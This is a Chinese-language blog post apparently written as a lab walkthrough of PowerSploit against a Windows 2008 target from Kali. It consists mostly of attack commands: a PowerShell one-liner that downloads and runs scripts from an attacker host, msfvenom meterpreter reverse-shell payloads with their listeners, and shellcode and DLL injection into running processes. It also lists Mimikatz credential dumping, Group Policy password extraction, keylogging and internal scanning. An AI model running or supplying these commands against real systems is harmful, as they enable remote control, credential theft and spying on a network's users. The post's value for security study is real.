Hu3sky's blog

内网中的PowerSploit

Word count: 391 / Reading time: 2 min
2019/04/24 Share

内网中的PowerSploit

靶机 Win2008
攻击机 Kali

Powershell下载命令

获取补丁

1
Get-WmiObject -Class Win32_QuickFixEngineering

一句话下载

1
IEX(New-Object Net.WebClient).DownloadString("http://192.168.107.1/PS1/Invoke-Shellcode.ps1)

Shellcode Injection

Invoke-Shellcode.ps1-Shellcode注入

  1. 先在win2008上下载攻击机上的ps脚本
1
IEX(New-Object Net.WebClient).DownloadString("http://192.168.107.1/PS1/Invoke-Shellcode.ps1)

1

  1. Kali下生成生成马
1
root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.107.145 lport=4444 -f powershell -o /root/桌面/test1

1

  1. 开启监听
1
2
3
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
  1. 靶机加载shellcode
    打开msf生成的ps1脚本,获取$buf的值

1

1
2
# 括号为$buf值
Invoke-Shellcode -Shellcode @()

也可以注入到别的进程里(这里以explorer的3508为例)

1
Invoke-Shellcode -ProcessID 3508 -Shellcode @()

DLL Injection

Invoke-DllInjection.ps1-DLL注入

步骤类似

  1. 下载
1
IEX(New-Object Net.WebClient).DownloadString("http://192.168.107.1/PS1/Invoke-DllInjection.ps1)
  1. mfs生成dll
1
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.107.146 lport=4444 -f dll -o /root/桌面/msf.dll
  1. 开启监听
1
2
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
  1. dll注入
1
Invoke-DllInjection -ProcessID 464 -Dll C:\Users\Administrator.WIN2008\Desktop\msf.dll

Scan

Invoke-Portscan.ps1-端口扫描

1
Invoke-Portscan -Hosts 192.168.107.1/24 -Ports 80

1

Get-ComputerDetails-获得登录信息

PowerView.ps1-域枚举等功能

Get-HttpStatus.ps1-目录扫描

1
Get-HttpStatus -Target '192.168.107.1' -Path ${字典}

Invoke-ReverseDnsLookup-扫描内网主机的ip对应的主机名

1

AV

Find-AVSignature.ps1-杀软签名

Password

Invoke-Mimikatz.ps1-管理员权限

1
Invoke-Mimikatz -DumpCreds

1

Get-GPPPassword.ps1

Get-Keystrokes.ps1 - 键盘记录

1

1

CATALOG
  1. 1. 内网中的PowerSploit
    1. 1.1. Powershell下载命令
    2. 1.2. Shellcode Injection
      1. 1.2.1. Invoke-Shellcode.ps1-Shellcode注入
    3. 1.3. DLL Injection
      1. 1.3.1. Invoke-DllInjection.ps1-DLL注入
    4. 1.4. Scan
      1. 1.4.1. Invoke-Portscan.ps1-端口扫描
      2. 1.4.2. Get-ComputerDetails-获得登录信息
      3. 1.4.3. PowerView.ps1-域枚举等功能
      4. 1.4.4. Get-HttpStatus.ps1-目录扫描
      5. 1.4.5. Invoke-ReverseDnsLookup-扫描内网主机的ip对应的主机名
    5. 1.5. AV
      1. 1.5.1. Find-AVSignature.ps1-杀软签名
    6. 1.6. Password
      1. 1.6.1. Invoke-Mimikatz.ps1-管理员权限
      2. 1.6.2. Get-GPPPassword.ps1
      3. 1.6.3. Get-Keystrokes.ps1 - 键盘记录